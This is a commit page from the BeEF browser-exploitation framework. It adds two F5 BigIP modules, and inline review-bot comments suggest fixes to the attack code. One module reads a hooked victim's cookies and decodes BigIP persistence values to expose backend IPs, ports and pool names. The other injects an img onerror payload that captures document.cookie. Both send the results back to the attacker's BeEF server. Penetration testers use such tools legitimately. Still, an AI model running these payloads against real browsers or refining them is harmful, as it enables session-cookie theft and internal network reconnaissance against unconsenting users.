Add first modules for ADC systems

Denis Kolegov
2015-03-31 04:33:10 -04:00
parent 86f99d5a51
commit bff02aaea5
6 changed files with 160 additions and 0 deletions


@@ -0,0 +1,89 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var poolName = 'unknown';
var routedDomain = 'unknown';
var BIGipCookieName = '';
var BIGipCookieValue = '';
var backend = '';
var result = '';
function f5CookieDecode(cookieValue){
var host;
var port;
if (cookieValue.match(/(\d{8,10})\.(\d{1,5})\./) !== null) {
host = cookieValue.split('.')[0];
host = parseInt(host);
host = '' + (host & 0xFF) + '.' +
((host >> 8) & 0xFF) + '.' +
((host >> 16) & 0xFF) + '.' +
((host >> 24) & 0xFF);
port = cookieValue.split('.')[1];
port = parseInt(port);
port = '' + (((port & 0xFF) << 8) | ((port >> 8) & 0xFF));
} else if (cookieValue.match(/rd\d+o0{20}f{4}([a-f0-9]{8})o(\d{1,5})/) !== null) {
host = cookieValue.split('ffff')[1].split('o')[0];
host = parseInt(host.slice(0,2), 16) + '.' +
parseInt(host.slice(2, 4), 16) + '.' +
parseInt(host.slice(4, 6), 16) + '.' +
parseInt(host.slice(6, 8), 16);
port = cookieValue.split('ffff')[1].split('o')[1];
port = parseInt(port).toString(16);
port = parseInt(port.slice(2, 4) + port.slice(0, 2), 16);
} else if (cookieValue.match(/vi([a-f0-9]{32})\.(\d{1,5})/) !== null) {
host = cookieValue.split('.')[0].slice(2, -1);
var decoded_host = '';
for (var i = 0; i < host.length; i += 4) {
decoded_host += host.slice(i, i + 4) + ':';
}
host = decoded_host;
port = cookieValue.split('.')[1];
port = parseInt(port);
port = '' + ( ((port & 0xFF) << 8) | ((port >> 8) & 0xFF) );
} else if (cookieValue.match(/rd\d+o([a-f0-9]{32})o(\d{1,5})/) !== null) {
host = cookieValue.split('o')[1];
var decoded_host = '';
for (var i = 0; i < host.length; i += 4){
decoded_host += host.slice(i,i+4) + ':';
}
host = decoded_host;
port = cookieValue.split('o')[2];
}
return {
host: host,
port: port
}
}
var m = document.cookie.match(/([~_\.\-\w\d]+)=(((?:\d+\.){2}\d+)|(rd\d+o0{20}f{4}\w+o\d{1,5})|(vi([a-f0-9]{32})\.(\d{1,5}))|(rd\d+o([a-f0-9]{32})o(\d{1,5})))(?:$|,|;|\s)/);
if (m !== null) {
BIGipCookieName = m[0].split('=')[0];
BIGipCookieValue = m[0].split('=')[1];
result = 'BigIP_cookie_name=' + BIGipCookieName;
// Retreive pool name via cookie name
if (BIGipCookieName.match(/^BIGipServer/) !== null) {
poolName = BIGipCookieName.split('BIGipServer')[1];
result += '&pool_name=' + poolName;
}
// Routed domain is used
if (BIGipCookieValue.match(/^rd/) !== null) {
routedDomain = BIGipCookieValue.split('rd')[1].split('o')[0];
result += '&routed_domain=' + routedDomain;
}
backend = f5CookieDecode(BIGipCookieValue);
result += '&host=' + backend.host + '&port=' + backend.port;
}
else result = 'result=BigIP coookie not found'
beef.net.send('<%= @command_url %>', <%= @command_id %>, result);
});
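Review bot: In `f5CookieDecode` the `vi…` branch reads the host with `cookieValue.split('.')[0].slice(2, -1)`, which drops the last of the 32 hex digits the regex matched; `slice(2)` keeps all of them. Both IPv6 branches append `':'` after every 4-character group, so the decoded host ends with a stray colon; collecting the groups in an array and returning `groups.join(':')` avoids that. When the outer `document.cookie` regex matches but none of the four inner patterns does, `host` and `port` stay undefined and the report carries `host=undefined&port=undefined`, so an explicit `'unknown'` default, as already used for `poolName`, would be clearer. The `parseInt` calls on decimal fields should also pass a radix, e.g. `parseInt(host, 10)`.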


@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
f5_bigip_cookie_disclosure:
enable: true
category: ["Network","ADC"]
name: "F5 BigIP Backend Cookie Disclosure"
description: "This module detects F5 BigIP persistent cookies and exposures all available information about backend (pool name, IP address and port, routed domain)."
authors: ["dnkolegov, ovbroslavsky, neoleksov"]
target:
working: ["ALL"]
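Review bot: `authors` is a one-element list holding a single comma-separated string, so anything that reads the list sees one author rather than three; `authors: ["dnkolegov", "ovbroslavsky", "neoleksov"]` lists them separately. The same line appears in the `f5_bigip_cookie_stealing` config later in this commit. In `description`, `exposures` should read `exposes`.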


@@ -0,0 +1,13 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class F5_bigip_cookie_disclosure < BeEF::Core::Command
def post_execute
return if @datastore['result'].nil?
save({'BigIPCookie' => @datastore['BigIPCookie']})
end
end
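Review bot: `post_execute` guards on `@datastore['result']` but saves `@datastore['BigIPCookie']`, and the command script added in this commit never sends a `BigIPCookie` field: it sends `BigIP_cookie_name`, `pool_name`, `routed_domain`, `host` and `port`, or `result` only on the not-found path. Assuming the datastore is keyed by those field names (the code that fills it is not on this page), the guard and the saved key never refer to data the script returned. The guard and the `save` call should name the same field the script sends, and a one-line comment above `post_execute` listing the expected keys would make the contract visible. `F5_bigip_cookie_stealing#post_execute` later in this commit has the same mismatch with `BigIPSessionCookies`.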


@@ -0,0 +1,15 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var t = document.createElement('div');
t.id = 'test';
document.body.appendChild(t);
var g = document.createElement('script');
g.text = "document.getElementById(\"test\").innerHTML=\"<img src=1 onerror=result=document.cookie;>\""
t.appendChild(g);
setTimeout('beef.net.send(\'<%= @command_url %>\', <%= @command_id %>, result)', 2000)
});
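Review bot: Nothing in this file documents what the value sent back can contain, and the config description ("all BigIP user's session cookies") says more than the code shows. The handler only assigns `document.cookie` to `result`, so cookies flagged HttpOnly are not visible to it and are never reported; a comment such as `// Reads document.cookie only: HttpOnly cookies are not included.` would state that limit. As a style point, `setTimeout` is given a string, which is evaluated like `eval`; passing a function is the usual form, `setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, result); }, 2000)`.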


@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
f5_bigip_cookie_stealing:
enable: true
category: ["Network","ADC"]
name: "F5 BigIP User's Cookie Stealing"
description: "This module retrieves all BigIP user's session cookies, bypassing sandbox restrictions."
authors: ["dnkolegov, ovbroslavsky, neoleksov"]
target:
working: ["ALL"]


@@ -0,0 +1,13 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class F5_bigip_cookie_stealing < BeEF::Core::Command
def post_execute
return if @datastore['result'].nil?
save({'BigIPSessionCookies' => @datastore['BigIPSessionCookies']})
end
end